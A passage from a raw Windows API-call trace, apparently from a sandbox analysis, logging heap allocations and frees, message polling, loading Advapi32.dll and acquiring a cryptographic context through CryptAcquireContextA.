(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0267.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0267.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0267.896] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0267.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0267.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0267.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0267.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0267.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0267.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0267.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0267.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0267.897] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0267.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0267.897] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0267.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0267.897] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0267.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0267.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0267.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ee8 [0267.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0267.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0267.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0267.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51bb0 [0267.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0267.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0267.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0267.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0267.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0267.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0267.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0267.897] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0267.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0267.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.898] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0267.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0267.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0267.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0267.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0267.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0267.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0267.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0267.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0267.898] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0267.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0267.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0267.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0267.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0267.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0267.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0267.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0267.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0267.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0267.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0267.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.898] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0267.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0267.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0267.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0267.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0267.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0267.899] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0267.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0267.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0267.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0267.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0267.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0267.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0267.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0267.899] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.900] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0267.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.900] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0267.900] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0267.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69888, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0267.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0267.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0267.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0267.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0267.900] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0267.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f148d8 [0267.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0267.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0267.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0267.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0267.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0267.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0267.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0267.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0267.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0267.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0267.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0267.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0267.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0267.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0267.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0267.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0267.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0267.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0267.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0267.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0267.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0267.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0267.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0267.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0267.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0267.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0267.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0267.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0267.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0267.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0267.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0267.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0267.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0267.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0267.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0267.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0267.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0267.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0267.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0267.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0267.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0267.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0267.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0267.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0267.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0267.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0267.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0267.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0267.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0267.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0267.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0267.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0267.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0267.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0267.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0267.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0267.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0267.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0267.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0267.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0267.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0267.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0267.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0267.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0267.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0267.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0267.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0267.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0267.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14b00 [0267.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f148d8 | out: hHeap=0x970000) returned 1 [0267.905] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0267.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0267.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0267.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0267.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0267.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0267.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0267.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0267.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0267.905] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0267.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0267.905] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0267.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0267.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0267.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55018 [0267.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0267.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0267.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0267.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0267.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0267.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0267.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0267.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0267.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0267.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0267.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0267.906] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0267.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0267.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0267.906] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0267.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0267.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0267.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0267.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0267.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0267.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0267.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0267.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0267.907] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0267.944] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 